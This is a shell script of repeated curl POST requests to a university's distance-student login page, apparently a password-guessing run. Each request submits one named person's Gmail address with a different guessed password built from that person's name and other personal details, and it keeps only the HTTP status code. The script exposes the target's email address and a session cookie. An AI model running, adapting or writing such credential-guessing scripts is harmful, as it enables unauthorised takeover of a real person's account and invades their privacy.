set -x

curl --write-out '\n%{stderr}%{http_code}\n' 'http://jmiregular.ucanapply.com/universitysystem/distancestudent/' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://jmiregular.ucanapply.com' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' -H 'Referer: http://jmiregular.ucanapply.com/universitysystem/distancestudent/' -H 'Cookie: PHPSESSID=t6p0supnrlh9a48f3p1n8cjmh4' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'EXAMROLLNUMBER=&STCOMMEMAIL=mohdsayemreza%40gmail.com&PASSWORD=katihar25' > /dev/null



curl --write-out '\n%{stderr}%{http_code}\n' 'http://jmiregular.ucanapply.com/universitysystem/distancestudent/' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://jmiregular.ucanapply.com' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' -H 'Referer: http://jmiregular.ucanapply.com/universitysystem/distancestudent/' -H 'Cookie: PHPSESSID=t6p0supnrlh9a48f3p1n8cjmh4' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'EXAMROLLNUMBER=&STCOMMEMAIL=mohdsayemreza%40gmail.com&PASSWORD=topper@2017' > /dev/null

curl --write-out '\n%{stderr}%{http_code}\n' 'http://jmiregular.ucanapply.com/universitysystem/distancestudent/' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://jmiregular.ucanapply.com' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' -H 'Referer: http://jmiregular.ucanapply.com/universitysystem/distancestudent/' -H 'Cookie: PHPSESSID=t6p0supnrlh9a48f3p1n8cjmh4' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'EXAMROLLNUMBER=&STCOMMEMAIL=mohdsayemreza%40gmail.com&PASSWORD=SayemTopper@2017' > /dev/null

curl --write-out '\n%{stderr}%{http_code}\n' 'http://jmiregular.ucanapply.com/universitysystem/distancestudent/' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://jmiregular.ucanapply.com' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' -H 'Referer: http://jmiregular.ucanapply.com/universitysystem/distancestudent/' -H 'Cookie: PHPSESSID=t6p0supnrlh9a48f3p1n8cjmh4' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'EXAMROLLNUMBER=&STCOMMEMAIL=mohdsayemreza%40gmail.com&PASSWORD=sayem@786' > /dev/null

curl --write-out '\n%{stderr}%{http_code}\n' 'http://jmiregular.ucanapply.com/universitysystem/distancestudent/' --compressed -X POST -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://jmiregular.ucanapply.com' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' -H 'Referer: http://jmiregular.ucanapply.com/universitysystem/distancestudent/' -H 'Cookie: PHPSESSID=t6p0supnrlh9a48f3p1n8cjmh4' -H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'EXAMROLLNUMBER=&STCOMMEMAIL=mohdsayemreza%40gmail.com&PASSWORD=CrackJMI@2024' > /dev/null

set +x
